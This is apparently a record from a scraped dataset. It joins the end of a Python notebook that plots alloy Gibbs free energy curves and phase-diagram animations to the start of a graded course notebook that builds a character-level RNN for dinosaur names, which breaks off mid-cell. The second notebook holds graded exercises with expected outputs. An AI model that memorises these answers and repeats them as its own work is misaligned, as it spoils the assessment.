[
[
"### Helper functions",
"_____no_output_____"
]
],
[
[
"# analytical function for the solid free energy curve\ndef curve_s(x, T, beta=0):\n \"\"\"This function plots the Gibbs free energy curve for the solid solution.\n \n Args:\n x (numpy.ndarray): An array of atomic fractions of B.\n T (float): The temperature in Kelvin.\n beta (float): The interaction parameter in J/mol.\n \n Returns:\n G_s (numpy.ndarray): An array of Gibbs free energy values in kJ/mol. \n \"\"\"\n S_mix = -8.314 * (np.multiply(x, np.log(x)) + np.multiply(1 - x, np.log(1 - x)))\n H_mix = beta * np.multiply(x, 1 - x)\n G_s = -T * S_mix + H_mix\n return G_s / 1000\n\n# analytical function for the liquid free energy curve\ndef curve_l(x, T, beta=0):\n \"\"\"This function plots the Gibbs free energy curve for the liquid solution.\n \n Args:\n x (numpy.ndarray): An array of atomic fractions of B.\n T (float): The temperature in Kelvin.\n beta (float): The interaction parameter in J/mol.\n \n Returns:\n G_l (numpy.ndarray): An array of Gibbs free energy values in kJ/mol. \n \"\"\"\n S_A, S_B = (52.7, 59.9)\n T_A, T_B = (1890 + 273, 1205 + 273)\n G_A = S_A * (T_A - T)\n G_B = S_B * (T_B - T)\n S_mix = -8.314 * (np.multiply(x, np.log(x)) + np.multiply(1 - x, np.log(1 - x)))\n H_mix = beta * np.multiply(x, 1 - x)\n G_l = x * G_B + (1 - x) * G_A - T * S_mix + H_mix\n return G_l / 1000",
"_____no_output_____"
],
[
"# find the common tangent using intersections and line search\ndef common_tangent(x, y1, y2, T, beta=0):\n \"\"\"This function calculates the common tangent of two convex curves.\n \n Args:\n x (numpy.ndarray): An array of atomic fractions of B.\n y1 (numpy.ndarray): y values for curve 1.\n y2 (numpy.ndarray): y values for curve 2.\n T (float): The temperature in Kelvin.\n beta (float): The interaction parameter for the solid solution.\n \n Returns:\n line (numpy.ndarray): y values for the common tangent.\n idmin (int): Index of the x-coordinate of the first tangent point.\n idmax (int): Index of the x-coordinate of the second tangent point.\n \"\"\"\n # Compute a derivative\n dx = 1e-3\n dy1 = derivative(func=curve_s, x0=x, dx=dx, args=(T, beta,))\n\n # Make an initial guess at the minimum of curve 1\n n = len(x)\n idmin, idmax = (0, n)\n idx = np.argmin(y1)\n yp = y1[idx]\n xp = x[idx]\n dyp = dy1[idx]\n\n # Construct the tangent line and count intersections with curve 2\n line = dyp * x + yp - dyp * xp\n diff = np.diff(np.sign(y2 - line))\n nnz = np.count_nonzero(diff)\n\n # They're the same curve. Used for finding miscibility gap.\n # I'm assuming that the curve is symmetric\n if np.linalg.norm(y1 - y2) < 1e-4:\n idmin = np.argmin(y1[:int(n/2)])\n idmax = np.argmin(y1[int(n/2):]) + int(n/2)\n\n # If the tangent line intersects curve 2, shift tangent point to the left\n elif nnz >= 1:\n while nnz >= 1:\n idx -= 1\n # try-except to avoid an out-of-bounds error \n try:\n yp = y1[idx]\n xp = x[idx]\n dyp = dy1[idx]\n line = dyp * x + yp - dyp * xp\n diff = np.diff(np.sign(y2 - line))\n nnz = np.count_nonzero(diff)\n except:\n break\n if diff.any():\n # Assign left and right indices of the tangent points\n # Here we do it each time because once we miss, we can't go back\n idmax = np.nonzero(diff)[0][0]\n idmin = idx\n\n # If the tangent line misses curve 2, shift tangent point to the right\n elif nnz < 1:\n while nnz < 1:\n idx += 1\n # try-except to avoid an out-of-bounds error \n try:\n yp = y1[idx]\n xp = x[idx]\n dyp = dy1[idx]\n line = dyp * x + yp - dyp * xp\n diff = np.diff(np.sign(y2 - line))\n nnz = np.count_nonzero(diff)\n except:\n break\n # Assign left and right indices of the tangent points\n idmin = idx\n idmax = np.nonzero(diff)[0][0]\n \n # Return a tuple\n return (line, idmin, idmax)",
"_____no_output_____"
],
[
"# plot the Gibbs free energy curves\ndef plot_Gx(T=1800, beta_s=0, beta_l=0):\n \"\"\"This function is called by the widget to perform the plotting based on inputs.\n \n Args:\n T (float): The temperature in Kelvin.\n beta_s (float): The interaction parameter for solids in J/mol.\n beta_l (float): The interaction parameter for liquids in J/mol.\n \n Returns:\n None, but a pyplot is displayed.\n \"\"\"\n # For the given temperature, calculate the curves and common tangent\n n = int(1e4)\n xmin, xmax = (0.001, 0.999)\n x = np.linspace(xmin, xmax, n)\n y_s = curve_s(x, T, beta_s)\n y_l = curve_l(x, T, beta_l)\n line, idmin, idmax = common_tangent(x, y_s, y_l, T, beta_s)\n\n # Mostly plot settings for visual appeal\n plt.rcParams.update({'figure.figsize':(8,6), 'font.size':20, \\\n 'lines.linewidth':4, 'axes.linewidth':2})\n fig, ax = plt.subplots()\n ymin, ymax = (-39, 19)\n ax.plot(x, y_s, c='C0', label='solid')\n ax.plot(x, y_l, c='C1', label='liquid')\n if abs(idmin) < n and abs(idmax) < n:\n ax.plot(x[idmin:idmax], line[idmin:idmax], c='k', lw=5, ls='-.')\n ax.vlines(x=[x[idmin], x[idmax]], ymin=ymin, \\\n ymax=[line[idmin], line[idmax]], linestyles='dotted', linewidth=3)\n ax.tick_params(top=True, right=True, direction='in', length=10, width=2)\n ax.set_xlim(0, 1)\n ax.set_ylim(ymin, ymax)\n ax.set_xlabel(r'$x_{B}$')\n ax.set_ylabel(r'$\\Delta G$ (kJ/mol)')\n ax.set_title('Gibbs free energy at T = {} K'.format(T), fontsize=18)\n plt.legend()\n plt.show()",
"_____no_output_____"
]
],
[
[
"## Animations using `FuncAnimation`\n\nFinally!! VLC/Windows has buggy glitches, but the embedded HTML version looks fine.\nAlso, **extremely high quality and low memory footprint**!! 🎉",
"_____no_output_____"
]
],
[
[
"# Initialize quantities\nn = int(1e4)\nxmin, xmax = (0.001, 0.999)\nx = np.linspace(xmin, xmax, n)\nliquidus = []\nsolidus = []\nTs = np.arange(1300, 2301, 5)\n\n# Plot settings\nplt.rcParams.update({'figure.figsize':(7,9.5), 'font.size':16})\nfig, ax = plt.subplots(nrows=2, ncols=1, sharex=True)\n\n# Initialize plot settings\nymin, ymax = -39, 19\nax[0].set_xlim(0, 1)\nax[0].set_ylim(ymin, ymax)\nax[0].set_ylabel(r'$\\Delta G$ (kJ/mol)', fontsize=22)\nax[0].set_title('Binary ideal solution\\nFree energy vs. composition', fontsize=20)\nax[0].tick_params(axis='both', labelsize=20)\n\nTmin, Tmax = 1100, 2500\nax[1].set_xlabel(r'$x_{B}$', fontsize=22)\nax[1].set_ylabel(r'$T$ (K)', fontsize=22)\nax[1].set_ylim(Tmin, Tmax)\nax[1].set_title('Phase diagram', fontsize=20)\nax[1].tick_params(axis='both', labelsize=20)\n\n# Initialize the lines\nl1, = ax[0].plot([], [], c='C1', label='liquid')\nl2, = ax[0].plot([], [], c='C0', label='solid')\nl3, = ax[1].plot([], [], c='C1', label='liquidus')\nl4, = ax[1].plot([], [], c='C0', label='solidus')\nl5, = ax[1].plot([], [], c='gray', ls='dashed', lw=4, alpha=0.5, zorder=-5)\nv3, = ax[0].plot([], [], c='k', ls='-.')\nv1 = ax[0].vlines(x=[0], ymin=[0], ymax=[0], linestyles='dotted', linewidth=4, color='k')\nv2 = ax[1].vlines(x=[0], ymin=[0], ymax=[0], linestyles='dotted', linewidth=4, color='k')\nax[0].legend(loc='upper right')\nax[1].legend(loc='upper right')\nplt.tight_layout()\n\n# This is needed to avoid an extra loop\ndef init():\n l1.set_data([], [])\n return l1,\n\n# This does the enumeration\ndef animate(i):\n global ymin, ymax, Tmax, liquidus, solidus, x, n, Ts, v1, v2\n T = Ts[i]\n if T % 100 == 0:\n print(T)\n y_s = curve_s(x, T)\n y_l = curve_l(x, T)\n line, idmin, idmax = common_tangent(x, y_s, y_l, T) # compute common tangent\n if idmin == 0 or idmin == n-1 or idmax == 0 or idmax == n-1:\n liquidus.append(None)\n solidus.append(None)\n else:\n liquidus.append(x[idmax])\n solidus.append(x[idmin])\n\n # set the data to be updated each iteration\n l1.set_data(x, y_l)\n l2.set_data(x, y_s)\n l3.set_data(liquidus, Ts[:np.where(Ts==T)[0][0]+1])\n l4.set_data(solidus, Ts[:np.where(Ts==T)[0][0]+1])\n l5.set_data([0, 1], [T, T])\n ax[0].annotate(text=f'$T={T}$ K', xy=(0.70, -33), fontsize=20, \n bbox=dict(fc='1.0', boxstyle='round'))\n \n # handle the tangent points\n if T == 2170:\n v1.remove()\n v2.remove()\n if abs(idmin) < n and abs(idmax) < n and idmax != 0:\n v1.remove()\n v2.remove()\n v3.set_data(x[idmin:idmax], line[idmin:idmax])\n v1 = ax[0].vlines(x=[x[idmin], x[idmax]], ymin=ymin, \\\n ymax=[line[idmin], line[idmax]], linestyles='dotted', linewidth=4, colors=['C0', 'C1'])\n v2 = ax[1].vlines(x=[x[idmin], x[idmax]], ymin=T, ymax=Tmax, linestyles='dotted', linewidth=4, colors=['C0', 'C1'])\n \n # return the artists that get updated (for blitting)\n return l1, l2, l3, l4, l5, v3, v2, v1\n\n# Create animation object\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=len(Ts), interval=1000, blit=True, repeat=False)\n\n# Save animation as MP4 (preferred)\n# anim.save('C:/Users/Enze/Desktop/test_funcanim.mp4', fps=9, dpi=300, writer='ffmpeg')\n# Save animation as GIF (file size MUCH larger!)\n# anim.save('C:/Users/Enze/Desktop/test_funcanim.gif', fps=9, dpi=300, writer='pillow') \n\nplt.show()",
"1300\n1400\n1500\n1600\n1700\n1800\n1900\n2000\n2100\n2200\n2300\n"
]
],
[
[
"## Other (sub-par) methods that I've tried...",
"_____no_output_____"
]
],
[
[
"# Accumulate images in a list for post-processing\nn = int(1e4)\nxmin, xmax = (0.001, 0.999)\nx = np.linspace(xmin, xmax, n)\nliquidus = []\nsolidus = []\nTs = np.arange(1300, 1450, 10)\n\nplt.rcParams.update({'figure.figsize':(7,9)})\nfig, ax = plt.subplots(nrows=2, ncols=1, sharex=True)\nfig.tight_layout()\nymin, ymax = -39, 19\nax[0].set_xlim(0, 1)\nax[0].set_ylim(ymin, ymax)\nax[0].set_ylabel(r'$\\Delta G$ (kJ/mol)')\n\nTmin, Tmax = 1100, 2500\nax[1].set_xlabel(r'$x_{B}$')\nax[1].set_ylabel(r'$T$ (K)')\nax[1].set_ylim(Tmin, Tmax)\nimages = []\n\nfor i,T in enumerate(Ts):\n if T % 100 == 0:\n print(T)\n y_s = curve_s(x, T)\n y_l = curve_l(x, T)\n line, idmin, idmax = common_tangent(x, y_s, y_l, T)\n if idmin == 0 or idmin == n-1 or idmax == 0 or idmax == n-1:\n liquidus.append(None)\n solidus.append(None)\n else:\n liquidus.append(x[idmax])\n solidus.append(x[idmin])\n\n ax[0].plot(x, y_s, c='C0', label='solid')\n ax[0].plot(x, y_l, c='C1', label='liquid')\n if abs(idmin) < n and abs(idmax) < n and idmax != 0:\n ax[0].plot(x[idmin:idmax], line[idmin:idmax], c='k', ls='-.')\n v1 = ax[0].vlines(x=[x[idmin], x[idmax]], ymin=ymin, \\\n ymax=[line[idmin], line[idmax]], linestyles='dotted', linewidth=4, color='k')\n v2 = ax[1].vlines(x=[x[idmin], x[idmax]], ymin=T, ymax=Tmax, linestyles='dotted', linewidth=4, color='k')\n ax[0].legend(loc='upper right')\n\n ax[1].plot(liquidus, Ts[:i+1], c='C1', label='liquidus')\n ax[1].plot(solidus, Ts[:i+1], c='C0', label='solidus')\n ax[1].plot([0, 1], [T, T], c='gray', ls='dashed', lw=4, alpha=0.5, zorder=-5)\n ax[1].annotate(text=f'$T={T}$ K', xy=(0.7, 2320), fontsize=24, \n bbox=dict(fc='1.0', boxstyle='round'))\n \n# fig.savefig(f'C:/Users/Enze/Desktop/plots/fig_{T:4d}')\n \n # Convert to PIL image for GIF\n buf = io.BytesIO()\n fig.savefig(buf)\n buf.seek(0)\n images.append(Image.open(buf))\n\n while len(ax[0].lines) > 0:\n ax[0].lines.remove(ax[0].lines[0])\n while len(ax[1].lines) > 0:\n ax[1].lines.remove(ax[1].lines[0])\n if abs(idmin) < n and abs(idmax) < n and idmax != 0:\n v1.remove()\n v2.remove()\n\n# Make a GIF by converting from PIL Image\nmake_gif = True\nif make_gif: # Quality is pretty good!!\n images[0].save('C:/Users/Enze/Desktop/test_PIL3.gif', save_all=True, append_images=images[1:], optimize=False, duration=200, loop=0)\n print('Finished making GIF')",
"_____no_output_____"
]
],
[
[
"### Convert PIL images to mp4 using [OpenCV](https://docs.opencv.org/master/d6/d00/tutorial_py_root.html)\n\nOK, this works! \nQuality could be improved... this is where FuncAnimation native support would probably be better.",
"_____no_output_____"
]
],
[
[
"# This movie is very large in size!!\nopencv_images = [cv2.cvtColor(np.array(i), cv2.COLOR_RGB2BGR) for i in images]\nheight, width, channels = opencv_images[0].shape\nfourcc = cv2.VideoWriter_fourcc(*'MP4V') # can also be 'MJPG' or 'MP4V'\nvideo = cv2.VideoWriter(filename='C:/Users/Enze/Desktop/test_opencv.mp4', \n fourcc=fourcc, fps=6, frameSize=(width, height))\nfor i in opencv_images:\n video.write(i)\ncv2.destroyAllWindows()\nvideo.release()",
"_____no_output_____"
]
],
[
[
"### Convert figure files using [`moviepy`](https://moviepy.readthedocs.io/en/latest/index.html)\n\nQuality seems a little worse than OpenCV. \nAlso takes a longggg time lol, but the file size is very small!",
"_____no_output_____"
]
],
[
[
"datadir = 'C:/Users/Enze/Desktop/plots/'\nclips = [ImageClip(os.path.join(datadir, m)).set_duration(0.2) for m in os.listdir(datadir)]\nconcat = concatenate_videoclips(clips, method='compose')\nconcat.write_videofile('C:/Users/Enze/Desktop/test_moviepy.mp4', fps=10)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb01dd68ebc12f210136309d77a63c4f35275091 | 75,600 | ipynb | Jupyter Notebook | notebooks/Dinosaurus_Island_Character_level_language_model_final_v3b.ipynb | tfburns/deep-learning-specialization | 8910a10518c0fbe2637813c848f632f86159993c | [
"MIT"
] | null | null | null | notebooks/Dinosaurus_Island_Character_level_language_model_final_v3b.ipynb | tfburns/deep-learning-specialization | 8910a10518c0fbe2637813c848f632f86159993c | [
"MIT"
] | null | null | null | notebooks/Dinosaurus_Island_Character_level_language_model_final_v3b.ipynb | tfburns/deep-learning-specialization | 8910a10518c0fbe2637813c848f632f86159993c | [
"MIT"
] | null | null | null | 41.883657 | 1,599 | 0.571667 | [
[
[
"# Character level language model - Dinosaurus Island\n\nWelcome to Dinosaurus Island! 65 million years ago, dinosaurs existed, and in this assignment they are back. You are in charge of a special task. Leading biology researchers are creating new breeds of dinosaurs and bringing them to life on earth, and your job is to give names to these dinosaurs. If a dinosaur does not like its name, it might go berserk, so choose wisely! \n\n<table>\n<td>\n<img src=\"images/dino.jpg\" style=\"width:250;height:300px;\">\n\n</td>\n\n</table>\n\nLuckily you have learned some deep learning and you will use it to save the day. Your assistant has collected a list of all the dinosaur names they could find, and compiled them into this [dataset](dinos.txt). (Feel free to take a look by clicking the previous link.) To create new dinosaur names, you will build a character level language model to generate new names. Your algorithm will learn the different name patterns, and randomly generate new names. Hopefully this algorithm will keep you and your team safe from the dinosaurs' wrath! \n\nBy completing this assignment you will learn:\n\n- How to store text data for processing using an RNN \n- How to synthesize data, by sampling predictions at each time step and passing it to the next RNN-cell unit\n- How to build a character-level text generation recurrent neural network\n- Why clipping the gradients is important\n\nWe will begin by loading in some functions that we have provided for you in `rnn_utils`. Specifically, you have access to functions such as `rnn_forward` and `rnn_backward` which are equivalent to those you've implemented in the previous assignment. ",
"_____no_output_____"
],
[
"## <font color='darkblue'>Updates</font>\n\n#### If you were working on the notebook before this update...\n* The current notebook is version \"3b\".\n* You can find your original work saved in the notebook with the previous version name (\"v3a\") \n* To view the file directory, go to the menu \"File->Open\", and this will open a new tab that shows the file directory.\n\n#### List of updates 3b\n- removed redundant numpy import\n* `clip`\n - change test code to use variable name 'mvalue' rather than 'maxvalue' and deleted it from namespace to avoid confusion.\n* `optimize`\n - removed redundant description of clip function to discourage use of using 'maxvalue' which is not an argument to optimize\n* `model`\n - added 'verbose mode to print X,Y to aid in creating that code.\n - wordsmith instructions to prevent confusion\n - 2000 examples vs 100, 7 displayed vs 10\n - no randomization of order\n* `sample`\n - removed comments regarding potential different sample outputs to reduce confusion.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom utils import *\nimport random\nimport pprint",
"_____no_output_____"
]
],
[
[
"## 1 - Problem Statement\n\n### 1.1 - Dataset and Preprocessing\n\nRun the following cell to read the dataset of dinosaur names, create a list of unique characters (such as a-z), and compute the dataset and vocabulary size. ",
"_____no_output_____"
]
],
[
[
"data = open('dinos.txt', 'r').read()\ndata= data.lower()\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint('There are %d total characters and %d unique characters in your data.' % (data_size, vocab_size))",
"There are 19909 total characters and 27 unique characters in your data.\n"
]
],
[
[
"\n* The characters are a-z (26 characters) plus the \"\\n\" (or newline character).\n* In this assignment, the newline character \"\\n\" plays a role similar to the `<EOS>` (or \"End of sentence\") token we had discussed in lecture. \n - Here, \"\\n\" indicates the end of the dinosaur name rather than the end of a sentence. \n* `char_to_ix`: In the cell below, we create a python dictionary (i.e., a hash table) to map each character to an index from 0-26.\n* `ix_to_char`: We also create a second python dictionary that maps each index back to the corresponding character. \n - This will help you figure out what index corresponds to what character in the probability distribution output of the softmax layer. ",
"_____no_output_____"
]
],
[
[
"chars = sorted(chars)\nprint(chars)",
"['\\n', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n"
],
[
"char_to_ix = { ch:i for i,ch in enumerate(chars) }\nix_to_char = { i:ch for i,ch in enumerate(chars) }\npp = pprint.PrettyPrinter(indent=4)\npp.pprint(ix_to_char)",
"{ 0: '\\n',\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h',\n 9: 'i',\n 10: 'j',\n 11: 'k',\n 12: 'l',\n 13: 'm',\n 14: 'n',\n 15: 'o',\n 16: 'p',\n 17: 'q',\n 18: 'r',\n 19: 's',\n 20: 't',\n 21: 'u',\n 22: 'v',\n 23: 'w',\n 24: 'x',\n 25: 'y',\n 26: 'z'}\n"
]
],
[
[
"### 1.2 - Overview of the model\n\nYour model will have the following structure: \n\n- Initialize parameters \n- Run the optimization loop\n - Forward propagation to compute the loss function\n - Backward propagation to compute the gradients with respect to the loss function\n - Clip the gradients to avoid exploding gradients\n - Using the gradients, update your parameters with the gradient descent update rule.\n- Return the learned parameters \n \n<img src=\"images/rnn.png\" style=\"width:450;height:300px;\">\n<caption><center> **Figure 1**: Recurrent Neural Network, similar to what you had built in the previous notebook \"Building a Recurrent Neural Network - Step by Step\". </center></caption>\n\n* At each time-step, the RNN tries to predict what is the next character given the previous characters. \n* The dataset $\\mathbf{X} = (x^{\\langle 1 \\rangle}, x^{\\langle 2 \\rangle}, ..., x^{\\langle T_x \\rangle})$ is a list of characters in the training set.\n* $\\mathbf{Y} = (y^{\\langle 1 \\rangle}, y^{\\langle 2 \\rangle}, ..., y^{\\langle T_x \\rangle})$ is the same list of characters but shifted one character forward. \n* At every time-step $t$, $y^{\\langle t \\rangle} = x^{\\langle t+1 \\rangle}$. The prediction at time $t$ is the same as the input at time $t + 1$.",
"_____no_output_____"
],
[
"## 2 - Building blocks of the model\n\nIn this part, you will build two important blocks of the overall model:\n- Gradient clipping: to avoid exploding gradients\n- Sampling: a technique used to generate characters\n\nYou will then apply these two functions to build the model.",
"_____no_output_____"
],
[
"### 2.1 - Clipping the gradients in the optimization loop\n\nIn this section you will implement the `clip` function that you will call inside of your optimization loop. \n\n#### Exploding gradients\n* When gradients are very large, they're called \"exploding gradients.\" \n* Exploding gradients make the training process more difficult, because the updates may be so large that they \"overshoot\" the optimal values during back propagation.\n\nRecall that your overall loop structure usually consists of:\n* forward pass, \n* cost computation, \n* backward pass, \n* parameter update. \n\nBefore updating the parameters, you will perform gradient clipping to make sure that your gradients are not \"exploding.\"\n\n#### gradient clipping\nIn the exercise below, you will implement a function `clip` that takes in a dictionary of gradients and returns a clipped version of gradients if needed. \n* There are different ways to clip gradients.\n* We will use a simple element-wise clipping procedure, in which every element of the gradient vector is clipped to lie between some range [-N, N]. \n* For example, if the N=10\n - The range is [-10, 10]\n - If any component of the gradient vector is greater than 10, it is set to 10.\n - If any component of the gradient vector is less than -10, it is set to -10. \n - If any components are between -10 and 10, they keep their original values.\n\n<img src=\"images/clip.png\" style=\"width:400;height:150px;\">\n<caption><center> **Figure 2**: Visualization of gradient descent with and without gradient clipping, in a case where the network is running into \"exploding gradient\" problems. </center></caption>\n\n**Exercise**: \nImplement the function below to return the clipped gradients of your dictionary `gradients`. \n* Your function takes in a maximum threshold and returns the clipped versions of the gradients. \n* You can check out [numpy.clip](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.clip.html). \n - You will need to use the argument \"`out = ...`\".\n - Using the \"`out`\" parameter allows you to update a variable \"in-place\".\n - If you don't use \"`out`\" argument, the clipped variable is stored in the variable \"gradient\" but does not update the gradient variables `dWax`, `dWaa`, `dWya`, `db`, `dby`.",
"_____no_output_____"
]
],
[
[
"### GRADED FUNCTION: clip\n\ndef clip(gradients, maxValue):\n '''\n Clips the gradients' values between minimum and maximum.\n \n Arguments:\n gradients -- a dictionary containing the gradients \"dWaa\", \"dWax\", \"dWya\", \"db\", \"dby\"\n maxValue -- everything above this number is set to this number, and everything less than -maxValue is set to -maxValue\n \n Returns: \n gradients -- a dictionary with the clipped gradients.\n '''\n \n dWaa, dWax, dWya, db, dby = gradients['dWaa'], gradients['dWax'], gradients['dWya'], gradients['db'], gradients['dby']\n \n ### START CODE HERE ###\n # clip to mitigate exploding gradients, loop over [dWax, dWaa, dWya, db, dby]. (≈2 lines)\n for gradient in [dWaa, dWax, dWya, db, dby]:\n gradient = np.clip(gradient,-maxValue,maxValue,out = gradient)\n ### END CODE HERE ###\n \n gradients = {\"dWaa\": dWaa, \"dWax\": dWax, \"dWya\": dWya, \"db\": db, \"dby\": dby}\n \n return gradients",
"_____no_output_____"
],
[
"# Test with a maxvalue of 10\nmValue = 10\nnp.random.seed(3)\ndWax = np.random.randn(5,3)*10\ndWaa = np.random.randn(5,5)*10\ndWya = np.random.randn(2,5)*10\ndb = np.random.randn(5,1)*10\ndby = np.random.randn(2,1)*10\ngradients = {\"dWax\": dWax, \"dWaa\": dWaa, \"dWya\": dWya, \"db\": db, \"dby\": dby}\ngradients = clip(gradients, mValue)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWya\\\"][1][2] =\", gradients[\"dWya\"][1][2])\nprint(\"gradients[\\\"db\\\"][4] =\", gradients[\"db\"][4])\nprint(\"gradients[\\\"dby\\\"][1] =\", gradients[\"dby\"][1])",
"gradients[\"dWaa\"][1][2] = 10.0\ngradients[\"dWax\"][3][1] = -10.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 10.]\ngradients[\"dby\"][1] = [ 8.45833407]\n"
]
],
[
[
"** Expected output:**\n\n```Python\ngradients[\"dWaa\"][1][2] = 10.0\ngradients[\"dWax\"][3][1] = -10.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 10.]\ngradients[\"dby\"][1] = [ 8.45833407]\n```",
"_____no_output_____"
]
],
[
[
"# Test with a maxValue of 5\nmValue = 5\nnp.random.seed(3)\ndWax = np.random.randn(5,3)*10\ndWaa = np.random.randn(5,5)*10\ndWya = np.random.randn(2,5)*10\ndb = np.random.randn(5,1)*10\ndby = np.random.randn(2,1)*10\ngradients = {\"dWax\": dWax, \"dWaa\": dWaa, \"dWya\": dWya, \"db\": db, \"dby\": dby}\ngradients = clip(gradients, mValue)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWya\\\"][1][2] =\", gradients[\"dWya\"][1][2])\nprint(\"gradients[\\\"db\\\"][4] =\", gradients[\"db\"][4])\nprint(\"gradients[\\\"dby\\\"][1] =\", gradients[\"dby\"][1])\ndel mValue # avoid common issue",
"gradients[\"dWaa\"][1][2] = 5.0\ngradients[\"dWax\"][3][1] = -5.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 5.]\ngradients[\"dby\"][1] = [ 5.]\n"
]
],
[
[
"** Expected Output: **\n```Python\ngradients[\"dWaa\"][1][2] = 5.0\ngradients[\"dWax\"][3][1] = -5.0\ngradients[\"dWya\"][1][2] = 0.29713815361\ngradients[\"db\"][4] = [ 5.]\ngradients[\"dby\"][1] = [ 5.]\n```",
"_____no_output_____"
],
[
"### 2.2 - Sampling\n\nNow assume that your model is trained. You would like to generate new text (characters). The process of generation is explained in the picture below:\n\n<img src=\"images/dinos3.png\" style=\"width:500;height:300px;\">\n<caption><center> **Figure 3**: In this picture, we assume the model is already trained. We pass in $x^{\\langle 1\\rangle} = \\vec{0}$ at the first time step, and have the network sample one character at a time. </center></caption>",
"_____no_output_____"
],
[
"**Exercise**: Implement the `sample` function below to sample characters. You need to carry out 4 steps:\n\n- **Step 1**: Input the \"dummy\" vector of zeros $x^{\\langle 1 \\rangle} = \\vec{0}$. \n - This is the default input before we've generated any characters. \n We also set $a^{\\langle 0 \\rangle} = \\vec{0}$",
"_____no_output_____"
],
[
"- **Step 2**: Run one step of forward propagation to get $a^{\\langle 1 \\rangle}$ and $\\hat{y}^{\\langle 1 \\rangle}$. Here are the equations:\n\nhidden state: \n$$ a^{\\langle t+1 \\rangle} = \\tanh(W_{ax} x^{\\langle t+1 \\rangle } + W_{aa} a^{\\langle t \\rangle } + b)\\tag{1}$$\n\nactivation:\n$$ z^{\\langle t + 1 \\rangle } = W_{ya} a^{\\langle t + 1 \\rangle } + b_y \\tag{2}$$\n\nprediction:\n$$ \\hat{y}^{\\langle t+1 \\rangle } = softmax(z^{\\langle t + 1 \\rangle })\\tag{3}$$\n\n- Details about $\\hat{y}^{\\langle t+1 \\rangle }$:\n - Note that $\\hat{y}^{\\langle t+1 \\rangle }$ is a (softmax) probability vector (its entries are between 0 and 1 and sum to 1). \n - $\\hat{y}^{\\langle t+1 \\rangle}_i$ represents the probability that the character indexed by \"i\" is the next character. \n - We have provided a `softmax()` function that you can use.",
"_____no_output_____"
],
[
"#### Additional Hints\n\n- $x^{\\langle 1 \\rangle}$ is `x` in the code. When creating the one-hot vector, make a numpy array of zeros, with the number of rows equal to the number of unique characters, and the number of columns equal to one. It's a 2D and not a 1D array.\n- $a^{\\langle 0 \\rangle}$ is `a_prev` in the code. It is a numpy array of zeros, where the number of rows is $n_{a}$, and number of columns is 1. It is a 2D array as well. $n_{a}$ is retrieved by getting the number of columns in $W_{aa}$ (the numbers need to match in order for the matrix multiplication $W_{aa}a^{\\langle t \\rangle}$ to work.\n- [numpy.dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html)\n- [numpy.tanh](https://docs.scipy.org/doc/numpy/reference/generated/numpy.tanh.html)",
"_____no_output_____"
],
[
"#### Using 2D arrays instead of 1D arrays\n* You may be wondering why we emphasize that $x^{\\langle 1 \\rangle}$ and $a^{\\langle 0 \\rangle}$ are 2D arrays and not 1D vectors.\n* For matrix multiplication in numpy, if we multiply a 2D matrix with a 1D vector, we end up with with a 1D array.\n* This becomes a problem when we add two arrays where we expected them to have the same shape.\n* When two arrays with a different number of dimensions are added together, Python \"broadcasts\" one across the other.\n* Here is some sample code that shows the difference between using a 1D and 2D array.",
"_____no_output_____"
]
],
[
[
"matrix1 = np.array([[1,1],[2,2],[3,3]]) # (3,2)\nmatrix2 = np.array([[0],[0],[0]]) # (3,1) \nvector1D = np.array([1,1]) # (2,) \nvector2D = np.array([[1],[1]]) # (2,1)\nprint(\"matrix1 \\n\", matrix1,\"\\n\")\nprint(\"matrix2 \\n\", matrix2,\"\\n\")\nprint(\"vector1D \\n\", vector1D,\"\\n\")\nprint(\"vector2D \\n\", vector2D)",
"matrix1 \n [[1 1]\n [2 2]\n [3 3]] \n\nmatrix2 \n [[0]\n [0]\n [0]] \n\nvector1D \n [1 1] \n\nvector2D \n [[1]\n [1]]\n"
],
[
"print(\"Multiply 2D and 1D arrays: result is a 1D array\\n\", \n np.dot(matrix1,vector1D))\nprint(\"Multiply 2D and 2D arrays: result is a 2D array\\n\", \n np.dot(matrix1,vector2D))",
"Multiply 2D and 1D arrays: result is a 1D array\n [2 4 6]\nMultiply 2D and 2D arrays: result is a 2D array\n [[2]\n [4]\n [6]]\n"
],
[
"print(\"Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\\n\",\n \"This is what we want here!\\n\", \n np.dot(matrix1,vector2D) + matrix2)",
"Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\n This is what we want here!\n [[2]\n [4]\n [6]]\n"
],
[
"print(\"Adding a (3,) vector to a (3 x 1) vector\\n\",\n \"broadcasts the 1D array across the second dimension\\n\",\n \"Not what we want here!\\n\",\n np.dot(matrix1,vector1D) + matrix2\n )",
"Adding a (3,) vector to a (3 x 1) vector\n broadcasts the 1D array across the second dimension\n Not what we want here!\n [[2 4 6]\n [2 4 6]\n [2 4 6]]\n"
]
],
[
[
